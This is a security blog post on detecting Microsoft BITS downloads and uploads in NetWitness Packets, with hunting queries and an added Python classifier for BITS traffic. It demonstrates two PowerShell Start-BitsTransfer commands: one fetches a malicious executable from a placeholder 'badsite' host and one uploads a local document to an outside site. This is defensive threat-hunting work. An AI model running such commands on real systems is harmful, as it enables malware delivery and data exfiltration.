Justin Grosfelt

Identifying BITS Uploads and Downloads

Blog post created by Justin Grosfelt on Mar 20, 2017

Part 1: NetWitness for Packets

I recently read an article from Microsoft (https://msdn.microsoft.com/en-us/library/windows/desktop/ee663885%28v=vs.85%29.aspx#to_create_a_synchronous_bits_transfer_job_with_multiple_files) describing how to use the Microsoft Background Intelligent Transfer Service (BITS) to perform file transfers. While not common, BITS has been used for downloading malware or uploading documents in past attacks. This got me wondering how I would identify this activity in NetWitness Packets.

 

There are two scenarios I tested:

  1. PowerShell/BITS used to download files from a remote server
  2. PowerShell/BITS used to upload files from a local machine

 

Scenario 1: PowerShell/BITS used to download files from a remote server

For this scenario, I am simulating a PowerShell command that is run on a machine inside an organization and attempts to download a malicious executable. Note that I chose a malicious executable to better illustrate the scenario; any file type could be downloaded using this method. Below is the PowerShell command I used:

 

PS C:\Users\moss> Start-BitsTransfer -Source http://www.badsite.com/badfile.exe -Destination C:\Users\moss\temp.exe

 

If we examine this communication in NetWitness Packets, we see something similar to Figure 1. BITS uses the HTTP protocol to retrieve the remote file. There are two important artifacts to notice. The first is the HEAD method in the initial request: HEAD is similar to a GET, except that the server returns only the response headers, so the client can check whether the resource is present without downloading it. The second is the 'Microsoft BITS/7.5' User-Agent, which is specific to BITS communication.

 

Figure 1: BITS HEAD Request

 

If BITS receives notification that the resource is available, it then initiates a GET request for the resource as shown in Figure 2.

 

Figure 2: BITS GET Request

 

If you would like to examine BITS downloads in your organization using NetWitness Packets, the below query/rule can help:

 

direction='outbound' && client contains 'Microsoft BITS'

 

Scenario 2: PowerShell/BITS used to upload files from a local machine

This scenario isn't all that different from Scenario 1, except that we are uploading a file to a remote site instead of downloading one. The PowerShell command I used is below:

PS C:\Users\moss> Start-BitsTransfer -Source 'C:\Users\Moss\badfiletoupload.docx' -Destination 'http://uploadwebsite.com' -TransferType Upload

For inspection in NetWitness Packets, I expected to see a POST method instead of a HEAD/GET, and that the same User-Agent, 'Microsoft BITS/7.5', would be used. As you can see in Figure 3, this assumption is wrong, well, sort of.

Figure 3: BITS_POST

BITS uses its own protocol on top of HTTP for data uploads, identified by the 'BITS_POST' method in the HTTP request header. Additional information on the BITS upload protocol is detailed here: https://msdn.microsoft.com/en-us/library/windows/desktop/aa362828(v=vs.85).aspx. The general traffic flow between the client and server is as follows:

Figure 4: BITS POST Protocol

In NetWitness Packets, we can follow the requests and responses to see the protocol in action.

Figure 5: BITS POST Protocol in NetWitness Packets

Identifying BITS downloads and uploads may be a useful addition to your hunting methodology; both can be found using the rules/queries below:

BITS Download: direction='outbound' && client contains 'Microsoft BITS'
BITS Upload: action='BITS_POST' && client contains 'Microsoft BITS'
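The two NetWitness rules above reduce to a method check plus a User-Agent check. As an added example that is not part of the original post, the following Python applies the same logic to raw HTTP request text (for instance, requests carved from a pcap or a proxy log); the sample requests, hostnames and paths are constructed for illustration.

```python
# Added example (not from the original post): classify HTTP requests as
# BITS download/upload activity using the two artifacts the post
# describes, the 'Microsoft BITS' User-Agent and the BITS_POST method.
from typing import Optional


def parse_request(raw: str) -> dict:
    """Parse the request line and headers of one raw HTTP request."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify_bits(raw: str) -> Optional[str]:
    """Mirror the NetWitness rules: client contains 'Microsoft BITS',
    then BITS_POST means upload and HEAD/GET means download."""
    req = parse_request(raw)
    if "Microsoft BITS" not in req["headers"].get("user-agent", ""):
        return None
    if req["method"] == "BITS_POST":
        return "bits_upload"
    if req["method"] in ("HEAD", "GET"):
        return "bits_download"
    return None


# Constructed sample requests (hosts and paths are placeholders).
HEAD_REQ = ("HEAD /badfile.exe HTTP/1.1\r\nHost: www.badsite.com\r\n"
            "User-Agent: Microsoft BITS/7.5\r\n\r\n")
# BITS-Packet-Type is a header of the BITS upload protocol; the
# classifier does not need it, but it shows which step of the
# upload session a BITS_POST belongs to.
UPLOAD_REQ = ("BITS_POST /upload HTTP/1.1\r\nHost: uploadwebsite.com\r\n"
              "User-Agent: Microsoft BITS/7.5\r\n"
              "BITS-Packet-Type: Create-Session\r\n\r\n")
BROWSER_REQ = ("GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
               "User-Agent: Mozilla/5.0\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("HEAD", HEAD_REQ), ("UPLOAD", UPLOAD_REQ),
                       ("BROWSER", BROWSER_REQ)):
        print(label, classify_bits(req))
```

The browser request is there as a negative case: a plain GET without the BITS User-Agent is not flagged, which is the same behaviour the `client contains 'Microsoft BITS'` clause gives in NetWitness.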

Happy Hunting,

Justin
